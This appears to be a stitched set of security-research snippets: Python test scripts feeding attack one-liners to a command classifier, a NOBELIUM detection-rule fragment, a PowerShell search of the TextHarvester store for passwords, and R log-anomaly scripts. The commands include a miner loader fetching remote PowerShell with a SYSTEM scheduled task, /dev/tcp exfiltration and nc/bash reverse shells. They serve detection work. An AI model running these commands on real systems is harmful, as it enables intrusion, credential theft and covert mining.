# LOLBINS coin miner commands from https://lolbas-project.github.io/ | |
# LOLBINS rundll32 execution: https://lolbas-project.github.io/lolbas/Binaries/Rundll32/#execute | |
# LOLBINS regsvr32 execution: https://lolbas-project.github.io/lolbas/Binaries/Regsvr32/#execute | |
# References: | |
# WannaMine: https://www.accenture.com/_acnmedia/pdf-46/accenture-threat-analysis-monero-wannamine.pdf | |
# https://logrhythm.com/blog/how-to-enable-process-creation-events-to-track-malware-and-threat-actor-activity/ | |
from lol.api import LOLC, PlatformType | |
# Classifier instance for Windows command lines. Per the original note,
# PlatformType.LINUX is the only other accepted platform value.
lolc = LOLC(PlatformType.WINDOWS)
commands=['cmd /c echo powershell -nop $a=([string](Get-WMIObject -Namespace root\Subscription -Class __FilterToConsumerBinding ));if(($a -eq $null) -or (!($a.contains(SCM Event Filter)))) {IEX(New-Object Net.WebClient).DownloadString(http://stafftest.spdns.eu:8000/mate6.ps1)} >%temp%\y1.bat && SCHTASKS /create /RU System /SC DAILY /TN yastcat /f /TR %temp%\y1.bat &&SCHTASKS /run /TN yas |
# from GTFOBins: file uploads (exfil) examples via bash, rlogin, and whois | |
# https://gtfobins.github.io/#+file%20upload | |
from lol.api import LOLC, PlatformType | |
# Classifier instance for Linux command lines. Per the original note,
# PlatformType.LINUX and PlatformType.WINDOWS are the only accepted values.
lolc = LOLC(PlatformType.LINUX)

# Sample one-liners from the GTFOBins "file upload" (exfiltration) category.
# $LFILE / $RHOST / $RPORT are left as GTFOBins-style placeholders and are not
# expanded here. NOTE(review): the shell quoting of the GTFOBins originals does
# not appear to be reproduced (the bash entry is unquoted), so the classifier
# is scored on the bare tokens rather than the exact string an attacker would
# run — worth confirming against the GTFOBins page if fidelity matters.
commands = [
    'bash -c echo -e POST / HTTP/0.9\n\n$(<$LFILE) > /dev/tcp/$RHOST/$RPORT',
    'rlogin -l "$(cat $LFILE)" -p $RPORT $RHOST',
    'whois -h $RHOST -p $RPORT base64 $LFILE',
]

# One classification and one tag per command, positionally aligned with
# `commands` (they are zipped together below).
classification, tags = lolc(commands)
for command, status, tag in zip (commands, classification, tags): |
# from GTFOBins: reverse shell examples via nc, gimp, and bash | |
# https://gtfobins.github.io/#+reverse%20shell
from lol.api import LOLC, PlatformType | |
# Classifier instance for Linux command lines. Per the original note,
# PlatformType.LINUX and PlatformType.WINDOWS are the only accepted values.
lolc = LOLC(PlatformType.LINUX)

# Sample one-liners from the GTFOBins "reverse shell" category.
# NOTE(review): the gimp entry stops right after socket creation (no connect,
# dup2 or shell spawn follows), so it is a truncated fragment rather than a
# working payload; the nc and bash entries are complete command lines.
commands = [
    'nc -e /bin/sh $RHOST $RPORT',
    'gimp -idf --batch-interpreter=python-fu-eval -b import sys,socket,os,pty;s=socket.socket()',
    'bash -c exec bash -i &>/dev/tcp/$RHOST/$RPORT <&1',
]

# One classification and one tag per command, positionally aligned with
# `commands` (they are zipped together below).
classification, tags = lolc(commands)
for command, status, tag in zip (commands, classification, tags): |
[ | |
{ | |
"title": "NOBELIUM FoggyWeb File Drop Sysmon",
"description": "After compromising an AD FS server, NOBELIUM was observed dropping version.dll on the system.", | |
"author": "Russ McRee (holisticinfosec), Florian Roth (@cyb3rops)",
"tags": [ | |
"attack.persistence", | |
"attack.defense_evasion" | |
], | |
"level": "critical", |
<?xml version="1.0" encoding="utf-8"?> | |
<sim> | |
<delete>false</delete> | |
<errordirectory>C:\Users\Public\Documents\</errordirectory> | |
<task> | |
<config> | |
<name>PowerShell_test</name> | |
<loop>3</loop> | |
<pause>1000</pause> | |
</config> |
# Search the current user's Input Personalization text-harvester store
# (WaitList.dat) for the string "password".
#
# SearchIndexer is terminated first — presumably because it holds the file
# open (confirm); the half-second pause gives the handle time to be released.
# NOTE(review): Stop-Process -Force against SearchIndexer.exe normally needs an
# elevated session, and killing that process is a noisy action that host
# telemetry (process-terminate / process-create logging) is likely to record.
Stop-Process -Name SearchIndexer -Force
Start-Sleep -Milliseconds 500

$waitListPath = "$env:USERPROFILE\AppData\Local\Microsoft\InputPersonalization\TextHarvester\WaitList.dat"

# -Encoding unicode reads the store as UTF-16LE. Select-String matches
# case-insensitively by default, so "Password" is caught as well.
Select-String -Path $waitListPath -Encoding unicode -Pattern "password"
# Created from Anomalize project, Matt Dancho | |
# https://github.com/business-science/anomalize | |
# Restrict the access log to a single server, drop any grouping, decompose the
# `count` series, flag anomalies in the remainder and plot the decomposition.
server_logs <- ungroup(filter(security_access_logs, server == "SERVER549521"))

# NOTE(review): the sibling scripts filter on "SERVER-549521" (hyphenated) and
# the plot title below uses that form too. If the `server` column holds the
# hyphenated value this filter silently returns zero rows — confirm which
# spelling the data actually uses.
decomposed <- time_decompose(server_logs, count)
flagged <- anomalize(decomposed, remainder)

plot_anomaly_decomposition(flagged) +
  labs(title = "Decomposition of Anomalized SERVER-549521 Downloads")
# Created from Anomalize project, Matt Dancho | |
# https://github.com/business-science/anomalize | |
# STL decomposition of the single-server `count` series with a 4-month trend
# window, IQR-based anomaly flagging on the remainder, then recomposition so
# the anomaly bands can be drawn back on the original scale.
decomposed <- time_decompose(SERVER549521, count, method = "stl", trend = "4 months")
flagged <- anomalize(decomposed, remainder, method = "iqr")
recomposed <- time_recompose(flagged)

# Anomaly visualization on the recomposed series.
plot_anomalies(recomposed, time_recomposed = TRUE) +
  labs(title = "SERVER-549521 Anomalies", subtitle = "STL + IQR Methods")
# Created from Anomalize project, Matt Dancho | |
# https://github.com/business-science/anomalize | |
# Get only SERVER549521 access | |
# Keep only the rows for SERVER-549521 and drop any grouping carried over from
# `security_access_logs`, so downstream decomposition sees one plain series.
SERVER549521 <- ungroup(filter(security_access_logs, server == "SERVER-549521"))
# Anomalize!! | |
SERVER549521 %>% | |
# Twitter + GESD | |
time_decompose(count, method = "twitter", trend = "4 months") %>% |
# Created from Anomalize project, Matt Dancho | |
# https://github.com/business-science/anomalize | |
# STL decomposition of `count` across the whole access log, IQR anomaly
# flagging on the remainder, then recomposition for plotting.
# The ncol = 3 facet layout suggests `security_access_logs` arrives grouped
# (e.g. by server) — confirm upstream; an ungrouped frame yields one panel.
decomposed <- time_decompose(security_access_logs, count, method = "stl")
flagged <- anomalize(decomposed, remainder, method = "iqr")
recomposed <- time_recompose(flagged)

# Anomaly visualization, one facet per group, with lighter points.
plot_anomalies(recomposed, time_recomposed = TRUE, ncol = 3, alpha_dots = 0.25) +
  labs(title = "Security Event Log Anomalies", subtitle = "STL + IQR Methods")